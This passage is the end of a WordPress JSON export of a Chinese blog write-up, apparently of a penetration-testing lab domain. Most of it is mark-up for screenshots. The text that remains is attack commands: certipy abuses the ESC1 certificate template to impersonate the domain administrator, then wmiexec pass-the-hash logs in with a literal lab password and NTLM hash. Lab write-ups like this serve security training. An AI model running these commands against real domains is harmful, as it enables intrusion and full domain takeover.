lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"705\" height=\"301\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2774\"  sizes=\"auto, (max-width: 705px) 100vw, 705px\" \/><\/div><\/figure>\n\n\n\n<p>\u9996\u5148\u5229\u7528XR Manager\u6a21\u677f\u4e3a\u57df\u7ba1\u8bf7\u6c42\u8bc1\u4e66<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca \"xiaorang-XIAORANG-DC-CA\" -template 'XR Manager'  -upn administrator@xiaorang.lab<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/13.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"721\" height=\"275\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2773\"  sizes=\"auto, (max-width: 721px) 100vw, 721px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u8f6c\u6362\u683c\u5f0f\uff0c\u8bf7\u6c42TGT\uff0cDCSync\u6216\u8005PTT<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7\r<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"719\" height=\"274\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2775\"  sizes=\"auto, (max-width: 719px) 100vw, 719px\" \/><\/div><\/figure>\n\n\n\n<p>\u62ff\u5230\u57df\u7ba1\u54c8\u5e0c\uff0cpth\u4e00\u4e0b\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk\r<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"726\" height=\"421\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2776\"  sizes=\"auto, (max-width: 726px) 100vw, 726px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab\/Administrator@172.22.9.26 -codec gbk\r<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"733\" height=\"477\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2777\"  sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9:<br \/>\nlog4j2 jndi<br \/>\ngrc\u63d0\u6743<br \/>\nSMB<br \/>\n\u5bc6\u7801\u55b7\u6d12<br \/>\nspn<br \/>\nESC1<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2760","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2760","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2760"}],"version-history":[{"count":3,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2760\/revisions"}],"predecessor-version":[{"id":2780,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2760\/revisions\/2780"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2760"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2760"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2760"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}